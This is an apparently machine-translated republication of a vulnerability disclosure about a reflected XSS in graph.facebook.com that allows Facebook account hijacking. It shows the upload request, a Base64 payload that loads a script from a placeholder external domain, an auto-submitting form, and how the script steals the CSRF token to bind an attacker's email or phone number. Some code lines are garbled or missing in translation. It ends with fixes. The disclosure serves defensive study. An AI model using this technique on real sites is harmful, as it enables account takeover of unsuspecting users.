Shulou(Shulou.com)05/31 Report--

This article is about how to use the reflective XSS in graph.facebook.com to achieve Facebook account hijacking. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.

What is shared below is a reflective XSS vulnerability in graph.facebook.com, which allows attackers to construct malicious links to lure victims to visit and add account-bound mailboxes or mobile phone numbers to hijack the victim's Facebook account.

Vulnerability situation

This vulnerability is valid only in IE and Edge browsers because some API endpoints in graph.facebook.com do not implement fully secure escape measures when handling HTML code responses. The response message exists in the JSON format, and the HTML code is included as the value of one of the fields, and the response message does not come with a Content-Type or X-Content-Type-Options header, so I have a chance to construct code execution in IE/Edge. These two types of browsers scan the entire page to determine the MIME file type, while other browsers check only the first few characters.

Loophole recurrence

1. First of all, we send the following POST request for upload:

POST / app/uploadsHost: graph.facebook.com access_token=ACCESS_TOKEN&file_length=100&file_type=PAYLOAD

ACCESS_TOKEN is a valid user access token generated by the first-party application of Facebook for Android, and PAYLOAD is the HTML code we want to insert to lure the victim to execute in the browser. When the request is submitted, the remote server returns a value similar to the following, including a session ID that will be used later (for more information, please refer to the official description of Facebook):

{"id": "upload:MTphdHRhY2htZW50Ojlk2mJiZxUwLWV6MDUtNDIwMy05yTA3LWQ4ZDPmZGFkNTM0NT8=?sig=ARZqkGCA_uQMxC8nHKI"}

After testing, it was found that there were no content security policy (CSP) restrictions in its response messages, so I wondered if I could insert HTML code with an js file containing external links, such as:

2. The upload request here is Base64 encoded by the Facebook backend, and the response is shown as follows, including the Payload that we have specially implanted:

Upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s

Therefore, after using this encoding string, there will be the following request, which can be used to initiate a POST request to Facebook:

Https://graph.facebook.com/upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s

3. Therefore, using the above request string, I added the valid access_token I generated in step 1 to it, and constructed a HTML page and put it into my website:

Document.forms [0] .submit ()

The page contains a submission style, and the response message after the victim visits is as follows:

{"h": "2:::GVo0nVVSEBm2kCDZXKFCdFSlCSZjbugbAAAP:e:1571103112:REDACATED:REDACATED:ARCvdJWLVDpBjUAZzrg"}

Importantly, the script file in https://DOMAIN.com/script.js will help me steal the victim's "fb_dtsg" CSRF token and send a binding request to https://www.facebook.com/api/graphql/ to add a cell phone number or email address to achieve indirect victim account hijacking.

Vulnerability repair

1. Add security escape measures to HTML code processing in file_type parameters.

2. Add a "Content-type: application/json" header to each response to avoid further attacks.

The above is how to use the reflective XSS in graph.facebook.com to achieve Facebook account hijacking. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.